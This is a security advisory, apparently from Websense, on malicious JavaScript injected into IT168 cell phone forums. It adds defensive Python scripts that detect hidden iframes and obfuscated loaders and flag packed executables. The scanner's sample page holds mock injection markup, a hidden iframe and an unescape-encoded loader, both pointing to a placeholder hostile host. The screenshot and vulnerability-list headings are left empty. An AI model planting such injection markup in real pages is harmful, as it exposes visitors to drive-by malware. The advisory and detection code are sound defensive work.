The Cell Phone Forums of Injection


Threat Type: Malicious Web Site / Malicious Code

Websense® Security Labs™ ThreatSeeker™ Network has discovered that several well-known cell phone forums hosted at IT168 in China have been injected with malicious JavaScript. The infected forums, including those for Nokia, Motorola, and Sony Ericsson, are serving exploits for a number of vulnerabilities that are being actively exploited in the wild. IT168 is one of the largest mainstream IT information platforms in China, providing IT product pricing and market information. It has a high Alexa rank of 170. The forums on the site, especially the cell phone bulletin boards, are very popular, so unsuspecting visitors can easily be infected simply by browsing them.

Screenshot of

Screenshot of the injected JavaScript:

The payload of the JavaScript:

The attackers capitalize on the forum pages' prominence in results from popular search engines such as Google, Baidu, and Sogou to spread the malicious code.

The payload of the iframe above:
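The two injection patterns the screenshots illustrate, a zero-size or CSS-hidden iframe and a `document.write(unescape(...))` loader that only reveals its iframe after decoding, can be checked for mechanically over a saved copy of a page. The following scanner is an added example, not Websense's tooling and not code from IT168; the sample page is constructed, and `hostile.example` and `video.example` are placeholder hosts rather than the real injection domains.

```python
"""Triage scanner for injected hidden iframes and obfuscated <script> blocks.

Added example, not Websense's tooling: it shows the checks an analyst would
run over a saved copy of a forum page to spot the kind of injection described
above. The page below is constructed for the example; hostile.example is a
placeholder host, not the real injection domain.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page: one legitimate embedded video iframe, one injected
# zero-size iframe, and a document.write(unescape(...)) stub that emits a
# second, CSS-hidden iframe only after decoding.
SAMPLE_PAGE = """
<html><body>
<div class="post">Has anyone flashed the new firmware on the N95?</div>
<iframe src="http://hostile.example/ad.htm" width="0" height="0" frameborder="0"></iframe>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fhostile.example%2Fx.htm%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'));
</script>
<iframe src="http://video.example/embed/123" width="480" height="360"></iframe>
</body></html>
"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Obfuscation idioms common in injected loaders of this kind.
OBFUSCATION = re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.I)
STRING_LITERAL = re.compile(r"'([^']*)'")


def _is_zero_dimension(value):
    """True for width/height values that make an iframe effectively invisible."""
    return value is not None and value.strip() in ("0", "1", "0px", "1px")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings: hidden_iframe or obfuscated_script."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self._check_iframe(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not (self._in_script and OBFUSCATION.search(data)):
            return
        self.findings.append(("obfuscated_script", data.strip()[:80]))
        # The dropper iframe is usually only visible after unescape(): decode
        # every %XX-escaped string literal and rescan the decoded markup.
        for literal in STRING_LITERAL.findall(data):
            if "%" in literal:
                self.findings.extend(scan_html(unquote(literal)))

    def _check_iframe(self, attrs):
        hidden = (_is_zero_dimension(attrs.get("width"))
                  or _is_zero_dimension(attrs.get("height"))
                  or HIDDEN_STYLE.search(attrs.get("style") or ""))
        if hidden:
            self.findings.append(("hidden_iframe", attrs.get("src") or ""))


def scan_html(html):
    """Return the list of (kind, detail) findings for one HTML document."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:18} {detail}")
```

Run against the constructed page, it reports the zero-size iframe, the obfuscated script, and the `display:none` iframe recovered from the decoded literal, while the 480x360 video embed is left alone. The decode step is the important one: a scanner that only looks at raw `<iframe>` tags misses the loader's real target.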

The targeted vulnerabilities are:


Once one of the vulnerabilities is triggered, an executable is downloaded to the user's machine. This malware installs a rootkit driver and also downloads the main "threat dispatcher". At least 29 malicious applications are downloaded in total. Some of them install global hooks on the machine, copy themselves into the Windows folder, and perform other malicious activities. The majority of these executables are packed with UPX, but a few use custom executable packers.
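A quick first pass over that many dropped executables is to read each file's PE section table: UPX leaves its default `UPX0`/`UPX1` section names, and custom packers usually still show the same layout, an executable section with no bytes on disk that the stub unpacks into at run time. The script below is an added triage example, not part of the original advisory or Websense's tooling; the three PE images it checks are constructed header-only samples (MZ stub, PE signature, COFF header and section table), not the actual dropped files.

```python
"""Packer triage from the PE section table.

Added example, not part of the original advisory or Websense's tooling. The
three executables below are constructed header-only PE images (MZ stub, PE
signature, COFF header and section table, nothing else), not the real samples.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
# Section names left behind by common packers. UPX0/UPX1 is the default UPX
# layout; an attacker can rename them, so absence proves nothing.
KNOWN_PACKER_SECTIONS = {
    "UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX", ".upx": "UPX",
    ".aspack": "ASPack", ".adata": "ASPack", ".petite": "Petite",
}
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def build_sample_pe(sections):
    """Construct a minimal PE image containing only the headers (for the example)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"),
                    vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
        for name, vsize, vaddr, rawsize, rawptr, chars in sections)
    return dos + b"PE\0\0" + coff + table


def pe_sections(data):
    """Parse the IMAGE_SECTION_HEADER entries out of a PE file's bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off, = struct.unpack_from("<I", data, 0x3C)
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsections, = struct.unpack_from("<H", data, pe_off + 6)
    opt_size, = struct.unpack_from("<H", data, pe_off + 20)
    off = pe_off + 24 + opt_size          # section table follows the optional header
    sections = []
    for _ in range(nsections):
        fields = struct.unpack_from(SECTION_FMT, data, off)
        sections.append({
            "name": fields[0].rstrip(b"\0").decode("latin-1"),
            "vsize": fields[1],      # VirtualSize
            "rawsize": fields[3],    # SizeOfRawData
            "chars": fields[9],      # Characteristics
        })
        off += struct.calcsize(SECTION_FMT)
    return sections


def packer_verdict(data):
    """Name a known packer, flag a packer-like layout, or report nothing obvious."""
    sections = pe_sections(data)
    for s in sections:
        if s["name"] in KNOWN_PACKER_SECTIONS:
            return KNOWN_PACKER_SECTIONS[s["name"]]
    # Packer layout without the tell-tale name: an executable section that
    # occupies no bytes on disk but a large virtual range is unpacked into at run time.
    for s in sections:
        if s["rawsize"] == 0 and s["vsize"] > 0 and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            return "unknown packer (empty executable section)"
    return "not obviously packed"


# Constructed samples: (name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, Characteristics). Raw pointers are nominal; no section
# data is present in these header-only images.
UPX_SAMPLE = build_sample_pe([
    ("UPX0", 0x10000, 0x1000, 0, 0x400, 0xE0000080),
    ("UPX1", 0x8000, 0x11000, 0x7A00, 0x400, 0xE0000040),
    (".rsrc", 0x1000, 0x19000, 0x200, 0x7E00, 0xC0000040),
])
CUSTOM_PACKED_SAMPLE = build_sample_pe([
    (".text", 0x20000, 0x1000, 0, 0x400, 0x60000020),
    (".data", 0x4000, 0x21000, 0x3C00, 0x400, 0xC0000040),
])
PLAIN_SAMPLE = build_sample_pe([
    (".text", 0x3000, 0x1000, 0x3000, 0x400, 0x60000020),
    (".data", 0x1000, 0x4000, 0x200, 0x3400, 0xC0000040),
])

if __name__ == "__main__":
    for label, image in (("upx", UPX_SAMPLE), ("custom", CUSTOM_PACKED_SAMPLE),
                         ("plain", PLAIN_SAMPLE)):
        print(f"{label:8} {packer_verdict(image)}")
```

Treat the verdict as a sorting aid, not an identification: a packer that keeps normal section names and non-zero raw sizes will pass as "not obviously packed", so samples in that bucket still need an entropy check or a debugger before they are declared unpacked.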

